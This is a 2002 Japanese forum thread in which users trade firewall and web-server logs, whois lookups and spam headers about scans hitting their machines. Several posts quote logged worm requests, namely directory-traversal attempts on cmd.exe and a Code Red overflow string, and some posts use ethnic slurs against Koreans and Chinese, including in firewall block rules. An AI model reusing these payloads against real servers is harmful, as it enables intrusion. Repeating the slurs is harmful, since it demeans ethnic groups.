The e-mail subscription address is: support@equalamail.com
To unsubscribe please click here.
or
Send an email with the word 'remove' in the subject line to remove@oin.oin2.com
Or you may mail us at:
PO BOX 810052
Boca Raton, Fl 33481-0052

211 :第三者中継可能?????????:02/05/20 12:28
remove@oin.oin2.com
mail.oin2.com (pri=10)
接続に失敗:ネットワークが混雑しているか、サーバが停止している可能性があります。
raider.oin2.com (pri=10)
接続に失敗:ネットワークが混雑しているか、サーバが停止している可能性があります。
> RSET
< 250 Ok
> MAIL FROM:< spamtest@oin2.com >
< 250 Ok
> RCPT TO:<" relaytest_abuse.net@oin2.com >
< 250 User not local; will forward to <" relaytest@abuse.net"@oin2.com >

To unsubscribe from the Offer888.com list,
visit http://opt-out.offer888.net/?e=ES2044_20020515_665@link2buy.com
http://opt-out.offer888.net/?e=cpa@oin.oin2.com
http://opt-out.offer888.net/?e=remove@oin.oin2.com
http://opt-out.offer888.net/?e=support@equalamail.com
http://opt-out.offer888.net/?e=remove@listmgr.clickformail.com
* To remove yourself from this mailing list, point your browser to:
http://i.mb00.net/remove?funnymoney
* Enter your email address ( offers@speeddeals.com remove@listmgr.clickformail.com
support@equalamail.com ) in the field
provided and click "Unsubscribe". The mailing list ID is "funnymoney".


212 :名無しさん@お腹いっぱい。:02/05/20 16:11
インド

213 :名無しさん@お腹いっぱい。:02/05/22 18:08
>>100
そいつは頑張ってるよ。
うちにも来たよ。
「KRNIC-KR」で何者か検索しようとしたら、このスレ見つけた(w

214 :名無しさん@お腹いっぱい :02/05/26 07:17
61.77.162.106
チョンは氏ね

215 :ジョルディたん:02/05/26 20:47
ユーロからアクられてる(((( ;゚Д゚)))ガクガクブルブル 。

216 :名無しさん@お腹いっぱい。:02/05/27 00:38
最近良くあるんだけど、netBIOSnameってのでアタックが来る。
netBIOSでのアタックってどんなもの?

217 :初級ネット板難民:02/05/27 04:55
ttp://www.intaa.net/~gato/ipfw.html#denykr
ここを参考に、ipfw使いではないんで、ipfで中姦ブロックを構築したんですが、
ipf.confはこんな感じでOKすか?


#BLOCK -- CHOSO
block in log quick on ne0 proto tcp/udp from 61.32.0.0/13 to any
block in log quick on ne0 proto tcp/udp from 61.40.0.0/14 to any
(略)
#BLOCK -- CHINKO
block in log quick on ne0 proto tcp/udp from 61.232.0.0/13 to any
block in log quick on ne0 proto tcp/udp from 202.14.88.0/24 to any
block in log quick on ne0 proto tcp/udp from 202.14.235.0/24 to any
(略)

218 :名無しさん@お腹いっぱい。:02/05/27 13:08
ベスト3
1. 韓国
2. アメリカ
3. 中国

他は
イタリア、台湾、オーストラリア、スペイン、イギリス、フランス、インド

ってところだな

219 :名無しさん@お腹いっぱい。:02/05/28 10:24
前にも出てたな、コイツ。

% Rights restricted by copyright. See http://www.apnic.net/db/dbcopyright.html
% (whois7.apnic.net)

%
% -----------------
Verio, Inc. (NET-VRIO-207-071-064)
8005 South Chester Street
Englewood, CO 80112
US

Netname: VRIO-207-071-064
Netblock: 207.71.64.0 - 207.71.127.255
Maintainer: VRIO

Coordinator:
Verio, Inc. (VIA4-ORG-ARIN) vipar@verio.net
303.645.1900

Domain System inverse mapping provided by:

NS0.VERIO.NET 129.250.15.61
NS1.VERIO.NET 204.91.99.140
NS2.VERIO.NET 129.250.31.190

ADDRESSES WITHIN THIS BLOCK ARE NON-PORTABLE
********************************************
Reassignment information for this block is
available at rwhois.verio.net port 4321
********************************************

Record last updated on 26-Sep-2001.
Database last updated on 25-May-2002 19:58:37 EDT.

The ARIN Registration Services Host contains ONLY Internet
Network Information: Networks, ASN's, and related POC's.
Please use the whois server at rs.internic.net for DOMAIN related
Information and whois.nic.mil for NIPRNET Information

220 :名無しさん@お腹いっぱい。:02/05/29 06:19
c3.fe1-3.kdd1.nap.jp.home.com
p5-0.lsanca1-cr8.bbnplanet.net


221 :数ヶ月分:02/05/29 06:53
韓国63
中国24
アメリカ6
インド2
ポーランド2
台湾2
イラン1
ドイツ1
フランス1
香港1
日本/(port:1433増加している)

222 : :02/05/29 23:27
>>221
韓国が異様に多いっすね。

223 :cheshire-cat:02/05/29 23:43
>>222
うちと大体同じくらい。

224 :名無しさん@お腹いっぱい。:02/05/29 23:58
つまり、ランキングが上位ってことは、ばれてるってことで・・・・

下位のほうが、巧妙な人が多いってことも考えられるな・・・

225 :cheshire-cat:02/05/30 00:04
>>224
その可能性も。

でも実際の問題は、上位2カ国はハッキング行為が野放しで、取締りを行っていないからかと。
扶桑社の教科書問題の時、リロードDOSの首謀者が実名割れていたんだけど。
逮捕されていないんだよな〜

226 :名無しさん@お腹いっぱい。:02/05/30 00:12
Intruder-IP 216.68.203.15
Date&Time 2002/05/29 23:41:28 GMT+9:00
Direction FWIN Source 2809 Target 1433
Service Microsoft-SQL-Server
Transport TCP(Flag:S)

Intruder-IP 168.103.65.172
Date&Time 2002/05/29 23:53:37 GMT+9:00
Direction FWIN Source 34085 Target 1433
Service Microsoft-SQL-Server
Transport TCP(Flag:S)
とまぁMS−SQLがやたらときまくってるんですけど、これってなに?
ゲイツに感染するウイルスでも流行ってるの?

227 :名無しさん@お腹いっぱい。:02/05/30 00:54
ルーターのログを見ると、中国、台湾が多いですね。
次に韓国。まぁ、納得という感じです。

228 :名無しさん@お腹いっぱい。:02/05/30 11:03
>226

そうだよ。
激しくガイシュツ

229 :名無しさん@お腹いっぱい。:02/05/30 22:02
Search results for '213.208.107.8'
inetnum 213.0.0.0 - 213.255.255.255
netname IANA-NETBLOCK-213
descr This network range is not allocated to APNIC.
descr If your whois search has returned this message, then you have
descr searched the APNIC whois database for an address that is
descr allocated by another Regional Internet Registry (RIR).
descr Please search the other RIRs at whois.arin.net or whois.ripe.net
descr for more information about that range.
country AU
admin-c IANA1-AP, inverse
tech-c IANA1-AP, inverse
remarks For general info on spam complaints email spam@apnic.net.
remarks For general info on hacking & abuse complaints email abuse@apnic.net.
mnt-by MAINT-APNIC-AP, inverse
mnt-lower MAINT-APNIC-AP, inverse
changed hm-changed@apnic.net 20020530
source APNIC
朝からウザイ。氏ね

230 :第三者中継可能!!!!!:02/05/31 01:08
Received:from210.103.141.136(HELO worldvision.or.kr) (210.103.141.136) by ** with SMTP
Received: from smtp0100.mail.yahoo.com [66.1.50.166] by mail.worldvision.or.kr (iMate Mail Server 4.6.0)
From:"Ronald Grove"< hellokeith@hotmail.com >
To: offers@hispeedoffers.net turbosurfer@offer888.net
chris@bblabs.com domreg@tag.com djoffers@freebies.com
abuse@offer888.com
Subject: let her have it.
Message-ID: < hellokeith_hotmail_com@mail.worldvision.or.kr >
Return-Path: hellokeith@hotmail.com

第三者中継可能!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
mail.worldvision.or.kr (pri=10)
問題あり:不正な中継を受け付けます。
(210.103.141.136)
ORDB database...登録されています。
maps realtime blackhole list...登録されていません。

231 :ひよこ名無しさん:02/05/31 01:26
Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 210.165.64.0-210.165.127.0
b. [ネットワーク名] INFOSPHERE
f. [組織名] InfoSphere (株式会社NTTPCコミュニケーションズ)
g. [Organization] InfoSphere (NTTPC Communications, Inc.)
m. [運用責任者] HH1558JP
n. [技術連絡担当者] RK448JP
n. [技術連絡担当者] SO1352JP
p. [ネームサーバ] ns1.sphere.ad.jp
p. [ネームサーバ] ns2.sphere.ad.jp
y. [通知アドレス] dns@sphere.ad.jp
[割当年月日] 1999/09/10
[返却年月日]
[最終更新] 2001/07/18 15:01:05 (JST)
ip-alloc@nic.ad.jp


232 :名無しさん@お腹いっぱい。:02/05/31 12:35
粘着イタ講、ウザイ。。。
FWIN,2002/05/28,03:24:53 +9:00 GMT,151.30.251.160:1612,:8080,TCP (flags:S)
FWIN,2002/05/28,03:27:49 +9:00 GMT,62.211.25.131:4635,:8080,TCP (flags:S)
FWIN,2002/05/28,03:30:50 +9:00 GMT,195.232.59.30:3294,:8080,TCP (flags:S)
FWIN,2002/05/28,03:37:07 +9:00 GMT,80.117.212.102:0,:0,ICMP (type:8/subtype:0)
FWIN,2002/05/28,16:59:51 +9:00 GMT,151.30.242.196:2668,:8080,TCP (flags:S)
FWIN,2002/05/29,01:12:22 +9:00 GMT,212.171.242.107:3683,:8080,TCP (flags:S)
FWIN,2002/05/29,01:43:51 +9:00 GMT,213.45.56.91:4513,:8080,TCP (flags:S)
FWIN,2002/05/29,01:58:26 +9:00 GMT,80.117.215.53:4715,:8080,TCP (flags:S)
FWIN,2002/05/29,02:07:18 +9:00 GMT,62.211.25.131:1965,:8080,TCP (flags:S)
FWIN,2002/05/29,02:10:40 +9:00 GMT,62.98.178.24:3810,:8080,TCP (flags:S)
FWIN,2002/05/29,22:42:04 +9:00 GMT,151.26.4.16:0,:0,ICMP (type:8/subtype:0)
FWIN,2002/05/29,23:34:12 +9:00 GMT,62.211.231.215:0,:0,ICMP (type:8/subtype:
FWIN,2002/05/30,00:36:43 +9:00 GMT,212.171.244.85:2444,:8080,TCP (flags:S)
FWIN,2002/05/30,01:20:43 +9:00 GMT,212.171.50.22:4005,:8080,TCP (flags:S)
FWIN,2002/05/30,17:42:38 +9:00 GMT,151.26.65.124:0,:0,ICMP (type:8/subtype:0)
FWIN,2002/05/30,18:06:00 +9:00 GMT,151.26.76.235:2488,:8080,TCP (flags:S)
FWIN,2002/05/30,21:05:40 +9:00 GMT,62.211.221.107:2244,:8080,TCP (flags:S)
FWIN,2002/05/30,21:11:51 +9:00 GMT,62.211.221.107:3162,:8080,TCP (flags:S)
FWIN,2002/05/30,21:36:21 +9:00 GMT,62.211.228.52:1633,:1080,TCP (flags:S)
FWIN,2002/05/30,21:43:36 +9:00 GMT,151.30.243.6:1834,:8080,TCP (flags:S)
FWIN,2002/05/30,21:44:20 +9:00 GMT,80.116.228.124:2286,:8080,TCP (flags:S)
FWIN,2002/05/30,22:25:38 +9:00 GMT,151.29.68.75:2169,:8080,TCP (flags:S)
FWIN,2002/05/30,22:27:02 +9:00 GMT,151.26.83.226:1715,:1080,TCP (flags:S)
FWIN,2002/05/30,22:34:47 +9:00 GMT,151.26.133.100:1866,:8080,TCP (flags:S)
FWIN,2002/05/30,23:29:20 +9:00 GMT,62.211.221.107:3425,:8080,TCP (flags:S)
FWIN,2002/05/31,01:27:04 +9:00 GMT,80.117.212.183:0,:0,ICMP (type:8/subtype:0)
FWIN,2002/05/31,01:33:39 +9:00 GMT,151.26.63.231:0,:0,ICMP (type:8/subtype:0)
FWIN,2002/05/31,01:47:40 +9:00 GMT,151.27.139.237:8080,:8080,TCP (flags:S)
FWIN,2002/05/31,03:14:03 +9:00 GMT,151.28.187.37:4826,:1080,TCP (flags:S)
FWIN,2002/05/31,03:14:03 +9:00 GMT,151.28.187.37:4827,:8080,TCP (flags:S)
FWIN,2002/05/31,03:14:03 +9:00 GMT,151.28.187.37:4829,:5555,TCP (flags:S)
FWIN,2002/05/31,03:14:03 +9:00 GMT,151.28.187.37:4830,:8888,TCP (flags:S)
FWIN,2002/05/31,03:14:04 +9:00 GMT,151.28.187.37:4831,:3128,TCP (flags:S)
FWIN,2002/05/31,03:21:02 +9:00 GMT,151.28.189.44:1761,:1080,TCP (flags:S)


233 :名無しさん@お腹いっぱい。:02/05/31 12:53
うちは圧倒的に韓国が多いな

234 :名無しさん@お腹いっぱい。:02/05/31 15:42
つーか、何で君等クッラクしかけられてんの?

235 :232:02/05/31 17:13
>>234
漏れが聞きたいっす(TдT)
2chしかしてないのに。。

236 :名無しさん@お腹いっぱい。:02/05/31 17:27
クラックってなによ?
ただのスキャンとちがうん?

237 :名無しさん@お腹いっぱい。:02/05/31 18:01
>>235
お前のは2ちゃんのポート確認。
http://pc.2ch.net/test/read.cgi/sec/1002776091/l50
これをよく読んどけ。

238 :名無しさん@お腹いっぱい。:02/05/31 19:39
ほとんどは串を探してるだけでしょ

239 :235:02/05/31 20:27
>>237
納得しますた。
ありがとうがざいますた。

240 :名無しさん@お腹いっぱい。:02/06/01 16:34
1週間に一度は韓国野郎からくるよ。

241 :名無しさん@お腹いっぱい。:02/06/01 18:34
今日来た人

日付: 2002/06/01 時刻: 15:55:58
規則「Backdoor/SubSeven トロイの木馬のデフォルト遮断」が xxx.xxx.xxx.xxx を遮断しました。 詳細:
インバウンド TCP 接続
ローカルアドレス、 サービスは xxx.xxx.xxx.xxx,27374
リモートアドレス、 サービスは 211.186.88.220,1599

242 :名無しさん@お腹いっぱい。:02/06/01 22:52
この人日本を蛆虫だって

% Rights restricted by copyright. See http://www.apnic.net/db/dbcopyright.html
% (whois6.apnic.net)

inetnum: 210.57.96.0 - 210.57.169.63
netname: ZERO-JP
descr: ZERO
descr: Internet Service Provider in Japan
descr: Providing ISDN, ADSL and dialup in various regions
descr: Tokyo, Japan
country: JP
admin-c: TL108-AP
tech-c: TL108-AP
mnt-by: MAINT-AP-LEVEL3
changed: cusfacprov.hk@level3.com 20010831
source: APNIC

person: Level3 Technical Provisioning
address: 8/F Warwick House (East Wing)
address: Taikoo Place, 979 King's Road
address: Quarry Bay
address: Hong Kong
country: HK
phone: +852-2201-8000
fax-no: +852-2201-8888
e-mail: CusFacProv.HK@hkg1.reach.com
nic-hdl: TL108-AP
mnt-by: MAINT-AP-LEVEL3
changed: michael.so@hkg1.reach.com 20020125
source: APNIC

243 :名無しさん@お腹いっぱい :02/06/03 14:42
202.105.237.54
マソコ ガバガバ


244 :名無しさん@お腹いっぱい。:02/06/07 00:19
あなたが検索された:  216.242.137.5   の
現在の検索先  からの応答は以下の通りです。
Rights restricted by copyright. See http://www.apnic.net/db/dbcopyright.html
(whois7.apnic.net)
inetnum: 216.0.0.0 - 216.255.255.255
netname: IANA-NETBLOCK-216
descr: This network range is not allocated to APNIC.
descr:
descr: If your whois search has returned this message, then you have
descr: searched the APNIC whois database for an address that is
descr: allocated by another Regional Internet Registry (RIR).
descr:
descr: Please search the other RIRs at whois.arin.net or whois.ripe.net
descr: for more information about that range.
country: AU
admin-c: IANA1-AP
tech-c: IANA1-AP
remarks: For general info on spam complaints email spam@apnic.net.
remarks: For general info on hacking & abuse complaints email abuse@apnic.net.
mnt-by: MAINT-APNIC-AP
mnt-lower: MAINT-APNIC-AP
changed: hm-changed@apnic.net 20020530
source: APNIC

role: Internet Assigned Numbers Authority
address: see http://www.iana.org.
e-mail: nobody@apnic.net
admin-c: IANA1-AP
tech-c: IANA1-AP
nic-hdl: IANA1-AP
remarks: For more information on IANA services
remarks: go to IANA web site at http://www.iana.org.
mnt-by: MAINT-APNIC-AP
changed: nobody@apnic.net 20020530
source: APNIC

245 :名無しさん@お腹いっぱい。:02/06/15 13:20
>>244
はるなら、こっちだな。>244 の英語の部分に、APNICのwhoisでもう一回検索汁ってかいてるで

Search results for '202.105.237.54 '
inetnum 202.105.237.52 - 202.105.237.55
netname MAOMING-CSCOM-COM-CO
descr MAOMING CHUSECOMPUTER COMPUTER CO.
country CN
admin-c LJ201-AP, inverse
tech-c LJ201-AP, inverse
mnt-by MAINT-CHINANET-GD, inverse
changed ipadm@gddc.com.cn 20010126
source APNIC


person LAI JIAHUI, inverse
address 2F,NO.8,HONGQI RO.,XINYI,MAOMING
country CN
phone +86-668-8880757
fax-no +86-668-8880757
e-mail IPUSER@GDDC.COM.CN, inverse
nic-hdl LJ201-AP, inverse
mnt-by MAINT-CHINANET-GD, inverse
changed ipadm@gddc.com.cn 20010126
source APNIC





246 :Apache初心者:02/06/15 20:42
>>90
サーバーをスタートした直後くらいにLG-Software(@韓国)からcode REDっぽいのが来て
あせったけど、M$-IISでなくってよかったぁと思った。

203.247.150.21 - - [14/Jun/2002:03:28:56 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 956
203.247.150.21 - - [14/Jun/2002:03:28:57 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 952
203.247.150.21 - - [14/Jun/2002:03:28:58 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 972
203.247.150.21 - - [14/Jun/2002:03:29:03 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 972
203.247.150.21 - - [14/Jun/2002:03:29:03 +0900] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1004
203.247.150.21 - - [14/Jun/2002:03:29:04 +0900] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1046
203.247.150.21 - - [14/Jun/2002:03:29:05 +0900] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1046
203.247.150.21 - - [14/Jun/2002:03:29:07 +0900] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1102
203.247.150.21 - - [14/Jun/2002:03:29:08 +0900] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1006
203.247.150.21 - - [14/Jun/2002:03:29:09 +0900] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1006
203.247.150.21 - - [14/Jun/2002:03:29:10 +0900] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1006
203.247.150.21 - - [14/Jun/2002:03:29:11 +0900] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1006
203.247.150.21 - - [14/Jun/2002:03:29:11 +0900] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 289
203.247.150.21 - - [14/Jun/2002:03:29:12 +0900] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 289
203.247.150.21 - - [14/Jun/2002:03:29:12 +0900] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1012
203.247.150.21 - - [14/Jun/2002:03:29:13 +0900] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1004

http://whois.nic.or.kr/whois/webapisvc?VALUE=203.247.150.21&WHOISTYPE=
IP Address : 203.247.128.0-203.247.159.255
Network Name : LGSOFTNET
Connect ISP Name : KREONET
Registration Date : 20000606

[ Organization Information ]
Orgnization ID : ORG104169
Org Name : LG Software Co., Ltd.
State : SEOUL
Address : SesilBuilding, 13-17, Yoido-dong Yeongdeungpo-gu
Zip Code : 150-010

ソフト会社がウイルスにやられてますってパケットを吐いているの、恥ずかし?
LG製品は避けようと思った。(w

>>100 >>149
KRNIC (Korea Network Information Center) Whois Lookup
http://whois.nic.or.kr/english/index.html
ここもブクマクして、日常の検索の一助となされよ。

たとえば、
http://whois.nic.or.kr/whois/webapisvc?VALUE=203.234.5.127&WHOISTYPE=
IP Address : 203.234.0.0-203.234.7.255
Network Name : KORNET-LLINE-NAMKANG-JINJUCOLLEGE
Connect ISP Name : KORNET
Connect Date : 20010531
Registration Date : 20020114

これなんか大学なのかな?

247 :名無しさん@お腹いっぱい。:02/06/15 21:52
KRNIC

248 :名無しさん@お腹いっぱい。:02/06/15 22:53
% Rights restricted by copyright. See http://www.apnic.net/db/dbcopyright.html
% (whois6.apnic.net)

inetnum: 147.0.0.0 - 147.255.255.255
netname: IANA-NETBLOCK-147
descr: This network range is not allocated to APNIC.
descr:
descr: If your whois search has returned this message, then you have
descr: searched the APNIC whois database for an address that is
descr: allocated by another Regional Internet Registry (RIR).
descr:
descr: Please search the other RIRs at whois.arin.net or whois.ripe.net
descr: for more information about that range.
country: AU
admin-c: IANA1-AP
tech-c: IANA1-AP
remarks: For general info on spam complaints email spam@apnic.net.
remarks: For general info on hacking & abuse complaints email abuse@apnic.net.
mnt-by: MAINT-APNIC-AP
mnt-lower: MAINT-APNIC-AP
changed: hm-changed@apnic.net 20020530
source: APNIC

role: Internet Assigned Numbers Authority
address: see http://www.iana.org.
e-mail: nobody@apnic.net
admin-c: IANA1-AP
tech-c: IANA1-AP
nic-hdl: IANA1-AP
remarks: For more information on IANA services
remarks: go to IANA web site at http://www.iana.org.
mnt-by: MAINT-APNIC-AP
changed: nobody@apnic.net 20020530
source: APNIC

AUってオーストラリア?

249 :名無しさん@お腹いっぱい。:02/06/15 22:55
>>248
わたしも同じところから頻繁にきます。
なんなんでしょう??

250 :名無しさん@お腹いっぱい。:02/06/15 23:02
>>249
まぁ警戒するに越した事はないでしょうね。

251 :名無しさん@お腹いっぱい。:02/06/16 00:16
みんなのHPが攻撃されてるんですか?

252 :名無しさん@お腹いっぱい。 :02/06/16 02:48
HTTPデーモンのログ
61.236.95.55 - - [16/Jun/2002:02:34:03 +0900] "GET /scripts/root.exe HTTP/1.0" 403 121
61.236.95.55 - - [16/Jun/2002:02:34:03 +0900] "GET /MSADC/root.exe HTTP/1.0" 403 121
61.236.95.55 - - [16/Jun/2002:02:34:03 +0900] "GET /c/winnt/system32/cmd.exe HTTP/1.0" 403 121
61.236.95.55 - - [16/Jun/2002:02:34:04 +0900] "GET /d/winnt/system32/cmd.exe HTTP/1.0" 403 121
61.236.95.55 - - [16/Jun/2002:02:34:04 +0900] "GET /scripts/..%5c../winnt/system32/cmd.exe HTTP/1.0" 403 121
61.236.95.55 - - [16/Jun/2002:02:34:04 +0900] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 403 121
61.236.95.55 - - [16/Jun/2002:02:34:05 +0900] "GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 403 121
61.236.95.55 - - [16/Jun/2002:02:34:05 +0900] "GET /msadc/..%5c../..%5c../..%5c/..チ../..チ../..チ../winnt/system32/cmd.exe HTTP/1.0" 403 121
61.236.95.55 - - [16/Jun/2002:02:34:06 +0900] "GET /scripts/..チ../winnt/system32/cmd.exe HTTP/1.0" 403 121
61.236.95.55 - - [16/Jun/2002:02:34:06 +0900] "GET /sc HTTP/1.0" 403 121
61.236.95.55 - - [16/Jun/2002:02:34:06 +0900] "GET /scripts/..タッ../winnt/system32/cmd.exe HTTP/1.0" 403 121
61.236.95.55 - - [16/Jun/2002:02:34:07 +0900] "GET /scripts/..?../winnt/system32/cmd.exe HTTP/1.0" 403 121
61.236.95.55 - - [16/Jun/2002:02:34:07 +0900] "GET /scripts/..@5c../winnt/system32/cmd.exe HTTP/1.0" 403 121
61.236.95.55 - - [16/Jun/2002:02:34:07 +0900] "GET /scripts/..@5c../winnt/system32/cmd.exe HTTP/1.0" 403 121
61.236.95.55 - - [16/Jun/2002:02:34:08 +0900] "GET /scripts/..%5c../winnt/system32/cmd.exe HTTP/1.0" 403 121
61.236.95.55 - - [16/Jun/2002:02:34:08 +0900] "GET /scripts/..%2f../winnt/system32/cmd.exe HTTP/1.0" 403 121
うざい

253 :名無しさん@お腹いっぱい。:02/06/16 03:02
んなの普通に毎日来るだろう。未だに
"GET /default.ida?NNNNNNN(略)NNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 342
とか
"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 761
とか、こんなんばっかりだよ。こういうセキュリティ無関心な糞は
無視するか、ハクの真似事の実験台にするしかない

254 :名無しさん@お腹いっぱい。:02/06/16 09:26
日付: 2002/06/14 時刻: 9:19:17
規則「Backdoor/SubSeven トロイの木馬のデフォルト遮断」が 61.214.103.245,27374 を遮断しました。 詳細:
インバウンド TCP 接続
ローカルアドレス、 サービスは 61.214.103.245,27374
リモートアドレス、 サービスは 211.111.71.239,4379
プロセス名は N/A

255 :名無しさん@お腹いっぱい。:02/06/16 09:41
やってもうた。
変なことしないでね。

256 :祝・日本vs.トルコ 対戦決定(246):02/06/16 15:53
トルコから来ただよ。ドメインは kablonet.net.tr。
近隣(.kr,.tw,.hk,.cn)からばっかじゃないって…

% This is the RIPE Whois server.
% The objects are in RPSL format.
% Please visit http://www.ripe.net/rpsl for more information.
% Rights restricted by copyright.
% See http://www.ripe.net/ripencc/pub-services/db/copyright.html

inetnum: 195.174.64.0 - 195.174.95.255
netname: KABLONET
descr: Cable Operator Network of Turk Telekom
descr: AcIbadem
country: TR
admin-c: TTBA1-RIPE
tech-c: TTBA1-RIPE
status: ASSIGNED PA
notify: ipg@telekom.gov.tr
mnt-by: AS9121-MNT
changed: ipg@telekom.gov.tr 20001116
source: RIPE

257 :名無しさん@お腹いっぱい。:02/06/16 18:58
IP: 203.255.92.3
DNS: bujung.chungbuk.ac.kr

毎日トロイにポトスキャ・・・
こりあまいったね・・・






スマン・・・

258 :名無しさん@お腹いっぱい。:02/07/03 19:03
あなたが検索されたIPアドレス[ 192.168.1.1 ]の企業名・団体名は以下の通りです。

% Rights restricted by copyright. See http://www.apnic.net/db/dbcopyright.html
% (whois6.apnic.net)

inetnum: 192.0.0.0 - 192.255.255.255
netname: IANA-NETBLOCK-192
descr: This network range is not allocated to APNIC.
descr:
descr: If your whois search has returned this message, then you have
descr: searched the APNIC whois database for an address that is
descr: allocated by another Regional Internet Registry (RIR).
descr:
descr: Please search the other RIRs at whois.arin.net or whois.ripe.net
descr: for more information about that range.
country: AU
admin-c: IANA1-AP
tech-c: IANA1-AP
remarks: For general info on spam complaints email spam@apnic.net.
remarks: For general info on hacking & abuse complaints email abuse@apnic.net.
mnt-by: MAINT-APNIC-AP
mnt-lower: MAINT-APNIC-AP
changed: hm-changed@apnic.net 20020530
source: APNIC

role: Internet Assigned Numbers Authority
address: see http://www.iana.org.
e-mail: nobody@apnic.net
admin-c: IANA1-AP
tech-c: IANA1-AP
nic-hdl: IANA1-AP
remarks: For more information on IANA services
remarks: go to IANA web site at http://www.iana.org.
mnt-by: MAINT-APNIC-AP
changed: nobody@apnic.net 20020530
source: APNIC

259 :cheshire-cat:02/07/03 19:08
>>258
>192.168.1.1
それ、クラスCのプライベートIPアドレス。
デフォでよく、ルーターとかのゲートウェイに設定される奴。

260 :梅宮:02/07/03 19:08
>>258
ナイスネタ。ナイスネタ。

すっげー笑える。

261 :名無しさん@お腹いっぱい。:02/07/03 20:15
>>258
とりあえず、馬鹿は氏ね。

262 :G:02/07/05 05:08
ファイアーウォールを使ったら207.46.203.45からポートスキャンされました。
国名がAUとなってました。初心者にいい勉強になるサイトありませんか。

263 :名無しさん@お腹いっぱい。:02/07/05 05:39
>>262
207.46.0.0−207.46.255.255
Microsoft

264 :名無しさん@お腹いっぱい。:02/07/05 05:59
Russiefa この都市はアメリカですか?
いつもここから攻撃があるのですが。
大体パソコンを立ち上げて15〜30分以内に攻撃が始まります。
もう俺はモバイルでネットしてるんだ。
余計なパケット料返せって感じです。

265 :名無しさん@お腹いっぱい。:02/07/05 17:08
なんだかんだいっても日本からは少ない・・
っていうか・・ないに等しい(ワーム除く)

韓国、アメリカが多いかなぁ・・・

266 :G:02/07/06 01:24
北国のファイアーウォールはZAよりいいみたいっすよ。使ってみた感じ、軽いし日本語だし
攻撃されてるのも簡単に見れるし。昨日はRstAtackていうのをやられた。気分悪。
うちはAUからばっかりですね。
2002/07/06 1:06:49ポートスキャン61.185.124.2TCP(111)
2002/07/06 1:10:42通信の要求195.122.202.242ICMP(1024)

267 :名無しさん@お腹いっぱい。:02/07/06 06:22
>>264
ヨルダンのルサイファ

268 :名無しさん@お腹いっぱい。:02/07/20 21:50
危機意識に目覚めて取り合えずZoneAlarmを入れたところ・・・
>>258みたいのが検知されるんですけど、どうしてですか?


269 :名無しさん@お腹いっぱい。:02/07/21 09:14
>>268
それ俺だよ。

270 : :02/07/21 09:15
>>268
よく見るネタだ。

271 :名無しさん@お腹いっぱい。:02/07/21 09:24
韓国鯖はさっさとSQLワームを直せYO!
いいかげんウザイ。

272 : :02/07/24 22:23
inetnum: 61.96.146.0 - 61.96.146.255
netname: KYCB-KR
descr: KYCB
descr: 371-6 WONDANG-DONG DUKYANG-GU GOYANG-SI
descr: KYONGGI
descr: 412-030
country: KR
admin-c: WJ36-KR
tech-c: JK327-KR
remarks: This IP address space has been allocated to KRNIC.
remarks: For more information, using KRNIC Whois Database
remarks: whois -h whois.nic.or.kr
remarks: This information has been partially mirrored by APNIC from
remarks: KRNIC. To obtain more specific information, please use the
remarks: KRNIC whois server at whois.krnic.net.
mnt-by: MNT-KRNIC-AP
changed: hostmaster@nic.or.kr 20020722
source: KRNIC

person: woncheol Jeong
country: KR
phone: +82-2-2106-6172
fax-no: +82-2-2106-6160
e-mail: mgr@cjdream.com
nic-hdl: WJ36-KR
remarks: This information has been partially mirrored by APNIC from
remarks: KRNIC. To obtain more specific information, please use the
remarks: KRNIC whois server at whois.krnic.net.
mnt-by: MNT-KRNIC-AP
changed: hostmaster@nic.or.kr 20020722
source: KRNIC

273 :名無しさん@お腹いっぱい。:02/07/25 12:24
うちはKRとAUからが圧倒的に多いよ。
そのたんびに、範囲指定で遮断リスト作ってるんだけど、キリがない……

274 :チョソ氏ね:02/07/25 16:07
inetnum: 211.176.221.0 - 211.176.221.255
netname: KWANGJUSO2-KR
descr: HANARO Telecom
descr: 1445-3 Seocho-Dong Seocho-Ku
descr: SEOUL
descr: 137-728
country: KR
admin-c: IS1740-KR
tech-c: SH2956-KR
remarks: This IP address space has been allocated to KRNIC.
remarks: For more information, using KRNIC Whois Database
remarks: whois -h whois.nic.or.kr
remarks: This information has been partially mirrored by APNIC from
remarks: KRNIC. To obtain more specific information, please use the
remarks: KRNIC whois server at whois.krnic.net.
mnt-by: MNT-KRNIC-AP
changed: hostmaster@nic.or.kr 20020722
source: KRNIC

person: Inyup Sung
country: KR
phone: +82-2-106
fax-no: +82-2-6266-6483
e-mail: info@hananet.net
nic-hdl: IS1740-KR
